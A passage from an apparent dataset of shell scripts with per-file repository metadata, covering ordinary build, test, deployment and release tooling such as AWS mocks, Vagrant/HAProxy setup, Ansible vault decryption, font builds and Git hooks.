if [ -f /sys/kernel/mm/pfa_tsk ]; then
echo $$ > /sys/kernel/mm/pfa_tsk
fi
exec $@
| true |
0b58d3ffb0bcf23a00f36aab11dbe63503bf9185
|
Shell
|
gruntwork-io/terraform-aws-couchbase
|
/examples/local-mocks/aws.sh
|
UTF-8
| 5,990 | 3.671875 | 4 |
[
"LicenseRef-scancode-unknown-license-reference",
"LicenseRef-scancode-free-unknown",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# This is a mock version of a script with the same name that replaces all the real methods, which rely on external
# dependencies, such EC2 Metadata and AWS API calls, with mock versions that can run entirely locally. This allows us
# to test all the scripts completely locally using Docker.
set -e
source "$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/string.sh"
source "$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/assert.sh"
source "$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)/array.sh"
function aws_get_instance_private_ip {
hostname -i
}
function aws_get_instance_public_ip {
hostname -i
}
function aws_get_instance_private_hostname {
hostname -i
}
function aws_get_instance_public_hostname {
hostname -i
}
function aws_get_instance_region {
# This variable is set in docker-compose.yml
echo "$mock_aws_region"
}
function aws_get_ec2_instance_availability_zone {
# This variable is set in docker-compose.yml
echo "$mock_availability_zone"
}
# Return the container ID of the current Docker container. Per https://stackoverflow.com/a/25729598/2308858
function aws_get_instance_id {
cat /proc/1/cgroup | grep 'docker/' | tail -1 | sed 's/^.*\///'
}
# This mock returns a hard-coded, simplified version of the aws ec2 describe-tags call.
function aws_get_instance_tags {
local readonly instance_id="$1"
local readonly instance_region="$2"
# The cluster_asg_name below is an env var from docker-compose.yml
cat << EOF
{
"Tags": [
{
"ResourceType": "instance",
"ResourceId": "$instance_id",
"Value": "$cluster_asg_name",
"Key": "Name"
},
{
"ResourceType": "instance",
"ResourceId": "$instance_id",
"Value": "$cluster_asg_name",
"Key": "aws:autoscaling:groupName"
}
]
}
EOF
}
# This mock returns a hard-coded, simplified version of the aws autoscaling describe-auto-scaling-groups call.
function aws_describe_asg {
local readonly asg_name="$1"
local readonly aws_region="$2"
local size
size=$(get_cluster_size "$asg_name" "$aws_region")
assert_not_empty_or_null "$size" "size of ASG $asg_name in $aws_region"
cat << EOF
{
"AutoScalingGroups": [
{
"AutoScalingGroupARN": "arn:aws:autoscaling:$aws_region:123456789012:autoScalingGroup:930d940e-891e-4781-a11a-7b0acd480f03:autoScalingGroupName/$asg_name",
"DesiredCapacity": $size,
"AutoScalingGroupName": "$asg_name",
"LaunchConfigurationName": "$asg_name",
"CreatedTime": "2013-08-19T20:53:25.584Z"
}
]
}
EOF
}
# Get the size of the cluster. This comes from env vars set in docker-compose.yml. Note that if we are requesting the
# size of a cluster that isn't in the same region as this Docker container, then we must instead be requesting the size
# of the replica cluster, so we return that.
function get_cluster_size {
local readonly asg_name="$1"
local readonly aws_region="$2"
# All the variables are env vars set in docker-compose.yml
if [[ "$aws_region" == "$mock_aws_region" ]]; then
echo -n "$cluster_size"
else
echo -n "$replica_cluster_size"
fi
}
# Get the base name of the containers in the cluster. This comes from env vars set in docker-compose.yml. Note that if
# we are requesting the containers in a different region than the one this container is in, then we must instead be
# requesting looking for containers in the replica cluster, so we return that.
function get_container_basename {
local readonly asg_name="$1"
local readonly aws_region="$2"
# All the variables are env vars set in docker-compose.yml
if [[ "$aws_region" == "$mock_aws_region" ]]; then
echo -n "$data_node_container_base_name"
else
echo -n "$replica_data_node_container_base_name"
fi
}
# This mock returns a hard-coded, simplified version of the aws ec2 describe-instances call.
function aws_describe_instances_in_asg {
local readonly asg_name="$1"
local readonly aws_region="$2"
local size
size=$(get_cluster_size "$asg_name" "$aws_region")
assert_not_empty_or_null "$size" "size of ASG $asg_name in $aws_region"
local container_base_name
container_base_name=$(get_container_basename "$asg_name" "$aws_region")
assert_not_empty_or_null "$container_base_name" "container base name for ASG $asg_name in $aws_region"
# cluster_size and data_node_container_base_name are env vars set in docker-compose.yml
local instances_json=()
for (( i=0; i<"$size"; i++ )); do
instances_json+=("$(mock_instance_json "$asg_name" "$container_base_name-$i" "2018-03-17T17:38:3$i.000Z" "i-0ace993b1700c004$i")")
done
local readonly instances=$(array_join "," "${instances_json[@]}")
cat << EOF
{
"Reservations": [
{
"Instances": [
$instances
]
}
]
}
EOF
}
# Return the JSON for the "Instances" field of a aws ec2 describe-instances call
function mock_instance_json {
local readonly asg_name="$1"
local readonly container_name="$2"
local readonly launch_time="$3"
local readonly instance_id="$4"
# These hostnames are set by Docker Compose networking using the names of the services
# (https://docs.docker.com/compose/networking/). We use getent (https://unix.stackexchange.com/a/20793/215969) to get
# the IP addresses for these hostnames, as that's what the servers themselves will advertise (see the mock
# get_instance_xxx_hostname methods above).
local couchbase_hostname
couchbase_hostname=$(getent hosts "$container_name" | awk '{ print $1 }')
assert_not_empty_or_null "$couchbase_hostname" "hostname for container $container_name"
cat << EOF
{
"LaunchTime": "$launch_time",
"InstanceId": "$instance_id",
"PublicIpAddress": "$couchbase_hostname",
"PrivateIpAddress": "$couchbase_hostname",
"PrivateDnsName": "$couchbase_hostname",
"PublicDnsName": "$couchbase_hostname",
"Tags": [
{
"Value": "$asg_name",
"Key": "Name"
},
{
"Value": "$asg_name",
"Key": "aws:autoscaling:groupName"
}
]
}
EOF
}
| true |
4f6ef16a504b8ea4be886b6a5b4bc72d56948072
|
Shell
|
changqian9/cloudcdn-signed-cookie-nginx
|
/run.sh
|
UTF-8
| 1,184 | 2.984375 | 3 |
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
if [ x$NOUSESECRET = xy ]
then
echo
else
BASE=$(dirname $(readlink -f $0))
source <(python3 $BASE/fetcher.py ${SECRETNAME}|base64 -d)
fi
set -ex
echo SIGNKEY="??"
set +x
test -n "$SIGNKEY"
set -x
echo KEYNAME="$KEYNAME"
test -n "$KEYNAME"
echo DOMAIN="$DOMAIN"
test -n "$DOMAIN"
export EXPIRES="${EXPIRES:-1200}"
export LOCATION_REGEXP="${LOCATION_REGEXP:-.*}"
echo BACKEND_SERVER="$BACKEND_SERVER"
test -n "$BACKEND_SERVER"
envsubst '$BACKEND_SERVER $LOCATION_REGEXP'\
< /etc/nginx/conf.d/default.conf.tmpl\
> /etc/nginx/conf.d/default.conf
exec /usr/local/bin/docker-entrypoint.sh
| true |
51a9cb348a655afce591c4ece7fee773fb684fc3
|
Shell
|
lspano-wellnet/pacobehatrunner
|
/paco_start.sh
|
UTF-8
| 1,879 | 3.0625 | 3 |
[] |
no_license
|
if [ -z "$1" ] || [ -z "$2" ] || [ -z "$3" ]; then
echo 'ERROR: one or more MANDATORY variables are undefined'
echo 'expected input like [country] [brand] [environment]'
echo "input Examples:"
echo ' '
echo '+----------------------------------------------+'
echo "| it dt uat => Intrend Italy UAT |"
echo "| gb mm test => MaxMara United Kingdom TEST |"
echo '+----------------------------------------------+'
exit 1
fi
googleSheet=$(echo ${4}| cut -d'/' -f 6)
echo ${googleSheet}
if [ -z "$4" ]; then
googleSheet="1tFtpxNy2TzKI2W53iQPBFEmSBOKDB_7yzPZw3LXvFlc"
echo 'OPTIONAL parameter for google sheet not specified'
echo 'using default Paco Orders Google Sheet'
echo 'https://docs.google.com/spreadsheets/d/1tFtpxNy2TzKI2W53iQPBFEmSBOKDB_7yzPZw3LXvFlc'
fi
brand=$(php Start.php -b "${1};${2};${3};${googleSheet}")
echo running on ${brand}
cd ..
## use this command to run on AWS
## output:
## --format pretty for debug)
## --format progress no debug)
docker run --rm -v "$PWD/behat.yml:/tests/behat.yml" -v "$PWD/features:/tests/features" -v "$PWD/artifacts:/tests/artifacts" -v "$PWD/vendor:/tests/vendor" -v "$PWD/credentials.json:/tests/credentials.json" -v "$PWD/token.json:/tests/token.json" wellnetimages/behat:2.0.1 /tests/bin/behat --format progress features/features_${brand}/TSF050-utils/TSF050_FT002-order_placer.feature:4
## use this command to run locally
## rm -rf artifacts/screenshots/*.png & docker run --rm --network tests_default -v "$PWD/behat.yml:/tests/behat.yml" -v "$PWD/features:/tests/features" -v "$PWD/artifacts:/tests/artifacts" -v "$PWD/vendor:/tests/vendor" -v "$PWD/credentials.json:/tests/credentials.json" -v "$PWD/token.json:/tests/token.json" wellnetimages/behat:2.0.0 /tests/bin/behat --format pretty features/features_${brand}/TSF050-utils/TSF050_FT002-order_placer.feature:4
| true |
2d113b8942c400a98dc5129fb4c8eceffe699358
|
Shell
|
lionelyoung/iosevka-custom
|
/iosevka_custom.sh
|
UTF-8
| 1,062 | 3.25 | 3 |
[
"Unlicense"
] |
permissive
|
#!/usr/bin/env bash
# Installs requirements and builds my preferences for Iosevka
#
# Homepage: https://github.com/be5invis/Iosevka
#
# Requirements:
# - nodejs (≥ 6.0)
# - ttfautohint
# - otfcc (≥ 0.7.0)
set -e
WDIR="$HOME/Projects/Iosevka"
# OS Check
if [ ! "$(uname)" == "Darwin" ]; then
echo "Error: Not on Mac"
exit 1
fi
# Working directory check
cd $WDIR || exit 1
# Install otfcc and ttfautohint
brew tap caryll/homebrew-tap
brew install caryll/tap/otfcc-mac64 ttfautohint
# Install Iosevka requirements
npm install
# Create my custom configuration
# ==============================
# - low asterisk
# - low underscore
# - single-story g
# - m with shorter middle leg
# - no ligations (term)
#
# The following defaults don't need to be specified:
# - fira @ (default)
# - curly braces (default)
# - slashed zero (default)
# - high tilde (default)
make custom-config design=\
'v-asterisk-low v-underscore-low v-g-singlestorey v-m-shortleg term'
# Build from source
make custom
# Installation instructions
echo "Done! Go look in $WDIR/dist/"
| true |
0a205e79e0ba5e897a378ebcea73797fd904d496
|
Shell
|
rjrivero/Cubietruck
|
/init.sh
|
UTF-8
| 2,090 | 3.578125 | 4 |
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# -------------------------------------------
# initializes the environment for running ansible
# This script must be invoked from the virtualenv
# directory, with
#
# . ./init.sh
#
# or
#
# source ./init.sh
# -------------------------------------------
export CWD=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
export ANSIBLE_INVENTORY="$CWD/hosts"
export VIRTUALENV_DIR="${VIRTUALENV_DIR:-$CWD/..}"
# If "-U" is passed on the command line, update.
# To update ansible:
function update {
pip install -U paramiko PyYAML Jinja2 httplib2 six
pushd .
cd ansible
git pull --rebase
git submodule update --init --recursive
popd
}
pushd .
# Enter the virtualenv
cd "$VIRTUALENV_DIR"
source bin/activate
# Activate the ansible environment
[ -f ansible/hacking/env-setup ] && source ansible/hacking/env-setup
# If "-U" is passed on the command line, update
if [ "x$1" == "x-U" ]; then
update
fi
# Decrypt the environment variables file
export ENVFILE="$CWD/environment"
if [ ! -f "$ENVFILE" ]; then
echo "********************************************"
echo "DESCIFRANDO FICHERO CON VARIABLES DE ENTORNO"
echo "********************************************"
ansible-vault decrypt --ask-vault-pass --output="$ENVFILE" "$ENVFILE.vault"
fi
source "$ENVFILE"
# Decrypt the cubie's private key
export KEYFILE="$CWD/playbooks/files/cert.key"
if [ ! -f "$KEYFILE" ]; then
echo "********************************************"
echo "DESCIFRANDO CLAVE PRIVADA DE CUBIETRUCK "
echo "********************************************"
ansible-vault decrypt --ask-vault-pass --output="$KEYFILE" "$KEYFILE.vault"
fi
# Decrypt the cubie's certificate
export CRTFILE="$CWD/playbooks/files/cert.crt"
if [ ! -f "$CRTFILE" ]; then
echo "********************************************"
echo "DESCIFRANDO EL CERTIFICADO DE CUBIETRUCK "
echo "********************************************"
ansible-vault decrypt --ask-vault-pass --output="$CRTFILE" "$CRTFILE.vault"
fi
popd
| true |
df71a4c65ecaff967a2df70ef200ec183277dd79
|
Shell
|
rimmington/qemu-rpi
|
/mkswap.sh
|
UTF-8
| 193 | 3.125 | 3 |
[] |
no_license
|
#!/bin/bash -eu
if [ -z "${1:-}" ]; then
echo "Usage: $0 NAME"
exit 1
fi
mkdir -p /dev/shm/qemu-rpi
ln -sf /dev/shm/qemu-rpi/swap-${1} ./swap
qemu-img create -f raw $(readlink ./swap) 1G
| true |
981ae3d279b0254859e6f3809a7bc7d5cf5d7f39
|
Shell
|
bitemyapp/bloodhound
|
/upload-docs.sh
|
UTF-8
| 967 | 3.5625 | 4 |
[
"BSD-3-Clause"
] |
permissive
|
#!/usr/bin/env bash
set -e
user=$1
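# $1 is the Hackage username handed to curl's -u flag below; curl prompts for
# the password interactively unless "user:password" is supplied instead.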
cabal_file=$(find . -maxdepth 1 -name "*.cabal" -print -quit)
if [ ! -f "$cabal_file" ]; then
echo "Run this script in the top-level package directory"
exit 1
fi
pkg=bloodhound
ver=0.19.0.0
if [ -z "$pkg" ]; then
echo "Unable to determine package name"
exit 1
fi
if [ -z "$ver" ]; then
echo "Unable to determine package version"
exit 1
fi
echo "Detected package: $pkg-$ver"
dir=$(mktemp -d build-docs.XXXXXX)
trap 'rm -r "$dir"' EXIT
cabal haddock --hoogle --hyperlink-source --html-location='/package/$pkg-$version/docs' --contents-location='/package/$pkg-$version'
cp -R dist/doc/html/$pkg/ $dir/$pkg-$ver-docs
tar cvz -C $dir --format=ustar -f $dir/$pkg-$ver-docs.tar.gz $pkg-$ver-docs
curl -X PUT \
-H 'Content-Type: application/x-tar' \
-H 'Content-Encoding: gzip' \
-u "$user" \
--data-binary "@$dir/$pkg-$ver-docs.tar.gz" \
"https://hackage.haskell.org/package/$pkg-$ver/docs"
| true |
0b0efbeb0f775d6007c42b330aa72e17423c7f7c
|
Shell
|
scholarsmate/svcplatform
|
/setup.sh
|
UTF-8
| 4,596 | 3.4375 | 3 |
[] |
no_license
|
#!/usr/bin/env bash
# Make sure password less sudo is enabled
sudo -v || { echo "Please set up password-less sudo first" >&2; exit 1; }
# Change the PWD to the directory where this script resides
cd $(dirname $(readlink -e $0))
if [[ -f ./setup.cfg ]]; then
echo "Reading configuration from setup.cfg"
source ./setup.cfg
fi
VAGRANT_VER=${VAGRANT_VER:-2.2.7}
SVC_PLATFORM=${SVC_PLATFORM:-platform}
SVC_REPO=${SVC_REPO:-https://github.com/scholarsmate/traefik2-docker-stack.git}
SVC_CERT_KEY_SIZE=${SVC_CERT_KEY_SIZE:-2048}
SVC_COUNTRY_CODE=${SVC_COUNTRY_CODE:-US}
SVC_STATE=${SVC_STATE:-Maryland}
SVC_ORGANIZATION=${SVC_ORGANIZATION:-Organization}
SVC_ORGANIZATIONAL_UNIT=${SVC_ORGANIZATIONAL_UNIT:-DevOps}
SVC_DOMAIN=${SVC_DOMAIN:-domain.com}
SVC_TIMEZONE=${SVC_TIMEZONE:-$(date +"%Z")}
RSYNC_BACKUP_SERVER=${RSYNC_BACKUP_SERVER:-}
RSYNC_BACKUP_USER=${RSYNC_BACKUP_USER:-devops}
cat << __EOF__ | tee ./setup.sav
##############################################################################
# Settings: $(date)
##############################################################################
VAGRANT_VER="${VAGRANT_VER}"
SVC_PLATFORM="${SVC_PLATFORM}"
SVC_REPO="${SVC_REPO}"
SVC_CERT_KEY_SIZE="${SVC_CERT_KEY_SIZE}"
SVC_COUNTRY_CODE="${SVC_COUNTRY_CODE}"
SVC_STATE="${SVC_STATE}"
SVC_ORGANIZATION="${SVC_ORGANIZATION}"
SVC_ORGANIZATIONAL_UNIT="${SVC_ORGANIZATIONAL_UNIT}"
SVC_DOMAIN="${SVC_DOMAIN}"
SVC_TIMEZONE="${SVC_TIMEZONE}"
RSYNC_BACKUP_SERVER="${RSYNC_BACKUP_SERVER}"
RSYNC_BACKUP_USER="${RSYNC_BACKUP_USER}"
##############################################################################
__EOF__
echo "Installing required packages for libvirt and vagrant ${VAGRANT_VER}..."
set -ex
# This is idempotent
sudo yum makecache
sudo yum install -y libvirt libvirt-devel ruby-devel gcc qemu-kvm haproxy openssl
# Generate TLS certificate (as required)
if [[ ! -f /etc/pki/tls/certs/svcplatform.pem ]]; then
echo "Generating TLS certificate..."
sudo mkdir -p /etc/pki/tls/certs
key_temp=$(mktemp /tmp/openssl.XXXXXX)
crt_temp=$(mktemp /tmp/openssl.XXXXXX)
openssl req -x509 -sha256 -nodes -days 3650 -newkey rsa:${SVC_CERT_KEY_SIZE} -keyout ${key_temp} -out ${crt_temp} -subj "/C=${SVC_COUNTRY_CODE}/ST=${SVC_STATE}/O=${SVC_ORGANIZATION}/OU=${SVC_ORGANIZATIONAL_UNIT}/CN=${SVC_DOMAIN}" -addext "subjectAltName = DNS:*.${SVC_DOMAIN}"
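  # HAProxy expects the private key and certificate concatenated into a single
  # PEM file, so append the certificate to the key before installing it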
echo "" >> ${key_temp}
cat ${crt_temp} >> ${key_temp}
sudo mv ${key_temp} /etc/pki/tls/certs/svcplatform.pem
sudo chown root:haproxy /etc/pki/tls/certs/svcplatform.pem
sudo chmod 440 /etc/pki/tls/certs/svcplatform.pem
rm -f ${crt_temp}
# Generate Strong Diffie-Hellman group
sudo openssl dhparam -out /etc/pki/tls/certs/dhparams.pem ${SVC_CERT_KEY_SIZE}
fi
# Setup the firewall
sudo systemctl start firewalld
sudo systemctl enable firewalld
# Setup haproxy
sudo setsebool -P haproxy_connect_any=1
sudo systemctl enable haproxy
if [[ ! -f /etc/rsyslog.d/haproxy.conf ]]; then
echo "Configuring rsyslog for HAProxy logs..."
sudo cp -v conf/rsyslog.d/haproxy.conf /etc/rsyslog.d/
sudo systemctl restart rsyslog
fi
sudo systemctl start haproxy
if [[ ! -f /etc/haproxy/haproxy.cfg ]]; then
echo "Configuring HAProxy..."
sudo cp -v conf/haproxy/haproxy.cfg /etc/haproxy/
sudo systemctl reload haproxy
# Allow port 8404 (HAProxy stats) through the firewall
# URL is http://<server_ip>:8404/stats
sudo firewall-cmd --permanent --zone=public --add-port=8404/tcp
fi
# Allow HTTP and HTTPS through the firewall
sudo firewall-cmd --permanent --zone=public --add-service=http
sudo firewall-cmd --permanent --zone=public --add-service=https
sudo firewall-cmd --reload
# If vagrant is installed, don't do anything, but if not, install the desired version
if [[ ! $( which vagrant ) ]]; then
sudo yum install -y https://releases.hashicorp.com/vagrant/${VAGRANT_VER}/vagrant_${VAGRANT_VER}_x86_64.rpm
fi
echo "Setting up the platform in ${SVC_PLATFORM}..."
cd "${SVC_PLATFORM}"
mkdir -p "repo"
[[ -d "repo/svcrepo" ]] || git clone "${SVC_REPO}" "repo/svcrepo"
vagrant up --provider=libvirt --no-parallel
vagrant status
echo "Halting machines to take pristine snapshots..."
vagrant halt
for vm_name in "${USER}-${SVC_PLATFORM}_nfs_storage" "${USER}-${SVC_PLATFORM}_docker_server_1" "${USER}-${SVC_PLATFORM}_docker_server_2" "${USER}-${SVC_PLATFORM}_docker_server_3"; do
sudo virsh snapshot-create-as --domain "$vm_name" --name "pristine" --description "pristine snapshot";
sudo virsh snapshot-list "$vm_name"
done
echo "Bringing machines back online..."
vagrant up --provider=libvirt --no-parallel
vagrant status
| true |
0c01abbd9c61089036c9ccb8936fd9e6c4d702f7
|
Shell
|
TChatzigiannakis/LLVMSharp
|
/tools/GenerateBindings.sh
|
UTF-8
| 1,252 | 2.671875 | 3 |
[
"NCSA"
] |
permissive
|
cd ClangSharpPInvokeGenerator
if [ -z "$1" ]; then
    echo "**ERROR**: LLVM Shared Library Location is required. A good value for this parameter is 'libLLVM' which will translate to 'libLLVM.dll'/'libLLVM.so'/'libLLVM.dylib' on their respective platforms."
exit 1
fi
if [ -z "$2" ]; then
    echo "**ERROR**: LLVM Include Directory is required. This is the directory which contains 'llvm' and 'llvm-c' as subdirectories"
exit 1
fi
dotnet run --m LLVM --p LLVM --namespace LLVMSharp --output Generated.tmp.cs --libraryPath $1 --include $2 --file $2/llvm-c/Analysis.h --file $2/llvm-c/BitReader.h --file $2/llvm-c/BitWriter.h --file $2/llvm-c/Core.h --file $2/llvm-c/Disassembler.h --file $2/llvm-c/ErrorHandling.h --file $2/llvm-c/ExecutionEngine.h --file $2/llvm-c/Initialization.h --file $2/llvm-c/IRReader.h --file $2/llvm-c/Linker.h --file $2/llvm-c/LinkTimeOptimizer.h --file $2/llvm-c/lto.h --file $2/llvm-c/Object.h --file $2/llvm-c/OrcBindings.h --file $2/llvm-c/Support.h --file $2/llvm-c/Target.h --file $2/llvm-c/TargetMachine.h --file $2/llvm-c/Types.h --file $2/llvm-c/Transforms/IPO.h --file $2/llvm-c/Transforms/PassManagerBuilder.h --file $2/llvm-c/Transforms/Scalar.h --file $2/llvm-c/Transforms/Vectorize.h
mv Generated.tmp.cs ..
cd ..
| true |
dffb29c9b2f5e32a22ba758817b059e9bb1de5d6
|
Shell
|
eckon/dotfiles
|
/scripts/connect-nested-container.sh
|
UTF-8
| 1,210 | 4 | 4 |
[] |
no_license
|
#!/usr/bin/env bash
###############################################################################
# script to quickly connect to a nested docker container
#
# example would be to get into an instance of a container on a remote server
# which might have changed the id and needs to be newly identified
###############################################################################
serverName="manager"
containerName="bighost-dev"
containerCurrentPath="/opt/myWebsites/singularity/www/cli/"
# get information about given container from the manager in a nice format
serviceInfo=$(
ssh $serverName \
'docker service ps \
-f "desired-state=running" \
--format "{{.Node}} {{.Name}}.{{.ID}}" \
--no-trunc ' $containerName
)
# given format: swarm-name.domain.com container-name.number.id
# first part before "." is needed (swarmX)
host=$(
echo "$serviceInfo" | awk -F '.' '{print $1}'
)
# second part after " " is needed (bighost-dev.1.abcdef12345)
container=$(
echo "$serviceInfo" | awk '{print $2}'
)
echo "[!] Found \"$host\" with \"$container\""
echo "[!] Trying to execute into it"
ssh -t "$host" \
"docker exec \
-w '$containerCurrentPath' \
-it $container bash"
| true |
af3a6a5b13e80be6755c74fde9bb3e6b5e35837b
|
Shell
|
mailanetworks/sx-packages
|
/docker-sxdrive/centos7/build.sh
|
UTF-8
| 724 | 2.9375 | 3 |
[] |
no_license
|
#!/bin/bash
dist=el7
BASEDIR=/home/makerpm
sudo cp -a /root/sxdrive.git $BASEDIR/sxdrive.git
sudo chown -R makerpm $BASEDIR/sxdrive.git
sudo ln -s /usr/lib64/qt5/bin/lrelease /usr/bin/lrelease
sed -i "s/SRCVERSION/$SRCVERSION/g" $BASEDIR/sxdrive.spec
# FIXME
cd $BASEDIR/sxdrive.git && \
git archive --format=tar HEAD --prefix=sxdrive-$SRCVERSION/ -o $BASEDIR/rpmbuild/SOURCES/sxdrive-$SRCVERSION.tar && \
cd $BASEDIR && \
rpmbuild -bb sxdrive.spec
if [ $? -ne 0 ]; then
echo Build failed
exit 1
fi
cd $BASEDIR/rpmbuild/RPMS/x86_64/ && \
for i in sxdrive*.rpm; do
RPMNAME=$i
sudo sxcp --config-dir=/root/.sx $i sx://indian.skylable.com/vol-packages/experimental-sxdrive/rhel/7/$RPMNAME
done
| true |
a36ee1e686c3f9aa71be964fdb57082b2e05fdb9
|
Shell
|
SultanSGillani/dotfiles
|
/bin/ssid
|
UTF-8
| 583 | 3.859375 | 4 |
[
"ISC"
] |
permissive
|
#!/usr/bin/env bash
if [[ "$1" == "-h" || "$1" == "--help" ]]; then cat <<HELP
Get WiFi SSID
http://benalman.com/
Usage: $(basename "$0")
If an SSID is specified and it is the current WiFi network's SSID, echo it,
otherwise echo nothing.
Copyright (c) 2012 "Cowboy" Ben Alman
Licensed under the MIT license.
http://benalman.com/about/license/
HELP
exit; fi
ssid=$(/System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport -I | sed -En 's/^ +SSID: +//p')
if [ "$1" ]; then
if [ "$(echo $ssid | grep -w $1)" ]; then
echo $1
fi
else
echo $ssid
fi
| true |
9a28b678f59c3be6fa3a1079e54b98485d9a33f8
|
Shell
|
ZYJCMD/ts-axios
|
/releash.sh
|
UTF-8
| 356 | 3.28125 | 3 |
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
set -e
echo "Enter release version: "
read VERSION
read -p "Releasing $VERSION - are you sure? (y/n) " -n 1 -r
echo
if [[ $REPLY =~ ^[Yy]$ ]]
then
echo "Releasing $VERSION ..."
git add -A
git commit -m "[build] $VERSION"
npm version $VERSION --message "[release] $VERSION"
git push origin master
npm publish
fi
| true |
054f73e11191974a37e05cf5272bc165943e222e
|
Shell
|
metalneox/dotfiles
|
/.config/polybar/scripts/cmus.sh
|
UTF-8
| 295 | 3.1875 | 3 |
[] |
no_license
|
#!/bin/sh
# Simple script to print the currently playing cmus track
musicIcon=""
cmus_current=$(cmus-remote -C status | grep "tag title" | awk '{print $3, $4, $5}')
if [ -z "$cmus_current" ]
then
echo -n "%{F#FF0000}$musicIcon off%{F-}"
else
echo -n "%{F#00FF00}$musicIcon $cmus_current%{F-}"
fi
| true |
34fe231f6bf6e4a66a737e55e32cdf6a44464439
|
Shell
|
zanul-siddiqui-au3/realiize
|
/scripts/tslint.sh
|
UTF-8
| 882 | 4.03125 | 4 |
[] |
no_license
|
#!/bin/bash
STAGED_FILES=$(git diff --cached --name-only --diff-filter=ACM | grep "\.tsx\{0,1\}$")
if [[ "$STAGED_FILES" = "" ]]; then
exit 0
fi
PASS=true
printf "\n\rValidating Typescript:\n\r"
# Check for tslint
which ./node_modules/.bin/tslint &> /dev/null
if [[ "$?" == 1 ]]; then
printf "\t\033[41mPlease install TSlint\033[0m"
exit 1
fi
for FILE in $STAGED_FILES
do
./node_modules/.bin/tslint "$FILE"
if [[ "$?" == 0 ]]; then
printf "\t\033[32mTSLint Passed: $FILE\033[0m\n\r"
else
printf "\t\033[41mTSLint Failed: $FILE\033[0m\n\r"
PASS=false
fi
done
printf "\nTypescript validation completed!\n\r"
if ! $PASS; then
printf "\033[41mCOMMIT FAILED:\033[0m \nYour commit contains files that should pass TSLint but do not. Please fix the TSLint errors and try again.\n\r"
exit 1
else
printf "\033[42mCOMMIT SUCCEEDED\033[0m\n\r"
fi
exit $?
| true |
581aa6a7b7d7e24db721da5aa8de659c566ddbb0
|
Shell
|
stephanarts/guardian
|
/tests/libguardian/file-verify.test
|
UTF-8
| 1,543 | 3.796875 | 4 |
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/sh
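# test_valid_hash SIZE [EXTRA]
# Creates a SIZE-byte random file, records its digest (shasum defaults to
# SHA-1), optionally appends EXTRA more random bytes, then asks file-helper
# to verify the digest over the first SIZE bytes only.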
test_valid_hash() {
TEMP_FILENAME=`mktemp`
# Test a file bigger then the buffer-size
dd if=/dev/urandom bs=$1 count=1 2>/dev/null >> $TEMP_FILENAME
SUM=`shasum $TEMP_FILENAME | awk '{ print $1 }'`
if test $# -eq 2
then
dd if=/dev/urandom bs=$2 count=1 2>/dev/null >> $TEMP_FILENAME
fi
./file-helper --test-verify \
$TEMP_FILENAME \
$SUM \
$1
RET=$?
if test $RET -ne 0
then
unlink $TEMP_FILENAME
return $RET;
fi
unlink $TEMP_FILENAME
return 0;
}
echo -n "Check Valid Hash of 128 byte long file"
test_valid_hash 128
if test $? -ne 0
then
echo " - FAILED"
return 1;
fi
echo " - OK"
echo -n "Check Valid Hash of 1024 byte long file"
test_valid_hash 1024
if test $? -ne 0
then
echo " - FAILED"
return 1;
fi
echo " - OK"
echo -n "Check Valid Hash of 1028 byte long file"
test_valid_hash 1028
if test $? -ne 0
then
echo " - FAILED"
return 1;
fi
echo " - OK"
echo -n "Check Valid Hash of first 128 bytes of a 1152 byte long file"
test_valid_hash 128 1024
if test $? -ne 0
then
echo " - FAILED"
return 1;
fi
echo " - OK"
echo -n "Check Valid Hash of first 1024 bytes of a 2048 byte long file"
test_valid_hash 1024 1024
RET=$?
if test $RET -ne 0
then
echo " - FAILED: "$RET
return 1;
fi
echo " - OK"
echo -n "Check Valid Hash of first 1024 bytes of a 1152 byte long file"
test_valid_hash 1024 128
if test $? -ne 0
then
echo " - FAILED"
return 1;
fi
echo " - OK"
return 0;
| true |
d7024b5c7f500f8f52a8167a643d729aad1b7080
|
Shell
|
jakezeal/lightning-ios-wallet
|
/grpc-swift-master/.travis-install.sh
|
UTF-8
| 1,369 | 3.046875 | 3 |
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/sh
#
# Copyright 2017, gRPC Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Install dependencies that aren't available as Ubuntu packages.
#
# Everything goes into $HOME/local.
#
# Scripts should add
# - $HOME/local/bin to PATH
# - $HOME/local/lib to LD_LIBRARY_PATH
#
cd
mkdir -p local
# Install swift
SWIFT_URL=https://swift.org/builds/swift-4.0-branch/ubuntu1404/swift-4.0-DEVELOPMENT-SNAPSHOT-2017-12-04-a/swift-4.0-DEVELOPMENT-SNAPSHOT-2017-12-04-a-ubuntu14.04.tar.gz
echo $SWIFT_URL
curl -fSsL $SWIFT_URL -o swift.tar.gz
tar -xzf swift.tar.gz --strip-components=2 --directory=local
# Install protoc
PROTOC_URL=https://github.com/google/protobuf/releases/download/v3.5.1/protoc-3.5.1-linux-x86_64.zip
echo $PROTOC_URL
curl -fSsL $PROTOC_URL -o protoc.zip
unzip protoc.zip -d local
# Verify installation
find local
| true |
0a327b43402e6e3d37408a1b9da96be5139fabc3
|
Shell
|
opetfoundation/eco_blockchain
|
/main-network-setup/scripts/start-root-ca.sh
|
UTF-8
